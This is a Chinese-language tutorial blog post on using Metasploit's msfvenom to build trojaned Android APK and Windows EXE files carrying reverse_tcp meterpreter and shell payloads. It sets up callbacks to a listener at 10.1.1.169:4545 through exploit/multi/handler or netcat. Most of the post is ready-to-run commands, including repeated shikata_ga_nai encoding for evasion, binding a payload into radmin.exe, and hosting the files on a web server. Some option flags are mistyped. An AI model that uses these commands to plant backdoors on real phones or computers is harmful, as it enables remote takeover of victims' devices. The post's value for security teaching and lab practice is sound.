• 6.Metasploit生成apk攻击Android实例


    Metasploit进阶第四讲 生成Android  apk文件

    01  msfvenom基本参数

    msfvenom介绍

    承接上回,staged/unstage payload如何利用?

    msfvenom是msfpayload及msfencode的结合体,可利用msfvenom将payload封装为木马程序,并在目标机上执行,在本地监听上线。

    msfvenom基本参数

    msfvenom  -h

    -p        ->指定payload

    -1        ->列出所有可用项

    -f         ->指定文件输出格式

    -e        ->指定编码格式

    -a        ->选择架构平台

    -o        ->选择文件输出路径,包含文件名

    -s         ->指定生成的payload最大大小

    -b        ->避免使用的字符

    -I         ->指定编码次数

    -c         ->添加自己的shellcode

    -xxxx.exc   -k    ->捆绑文件到xxx.cxc

    以下使用msfvenom分别是什么意思?

    Msfvenom   -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

    -e x86/shikata_ga_nai –I 3 –f exe -o abc.exe

    Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

    -b ‘×00xff' –I 3 –f exe -o abc.exe

    Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

    -e x86/shikata_ga_nai –k –x /usr/share/windows-binaries/radmin.exe –f exe -o radmin.exe

    msfvenom生成apk文件

    staged payload:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

    R>/var/www/html/Lliang.apk

    metasploit:

    use exploit/multi/handler                  加载模块

    set payload android/meterpreter/reverse_tcp      选择Payload

    set LHOST10.1.1.169这里的地址设置成我

    们刚配置木马的IP地址

    set LPORT4545这里的端口设置成刚才我们

    配置木马所监听的端口

    unstage payload:

     

    msfvenom  –p  windows/shell_reverse_tcp LHOST=10.1.1.169 LPORT=4545

    -f exe –o /var/www/html/shell-stageless.exe

    metasploit:

    use exploit/multi/handler加载模块

    set payload windows/shell_reverse_tcp 选择Payload

    unstage payload:

    msfvenom  -p  windows/shell reverse_tcp LHOST=10.1.1.169 LPORT=4545     -f exe  -o  /var/www/html/shell-stageless.exe

     netcat:在两台电脑之润建立链接并返回两个数据流

    nc  -lyp  4545    -监听4545端口

    -v/-vw   显示指令执行过程

    -l  使用监听模式,管控传入的资料

    -p   设置本地主机使用的通信端口

    staged payload不适用于netcat,必须使用Metasploit的exploit/multi/handler模块。要从主机上的metasploit handler上下载完整的payload

  • 相关阅读:
    Live2D 看板娘
    Live2D 看板娘
    Live2D 看板娘
    Live2D 看板娘
    Live2D 看板娘
    Live2D 看板娘
    Live2D 看板娘
    Live2D 看板娘
    Bound mismatch: The typae CertificateDirectory is not a valid substitute for the bounded parameter <M extends Serializable>
    Duplicate property mapping of contactPhone found in
  • 原文地址:https://www.cnblogs.com/lvwuwa/p/11129043.html
Copyright © 2020-2023  润新知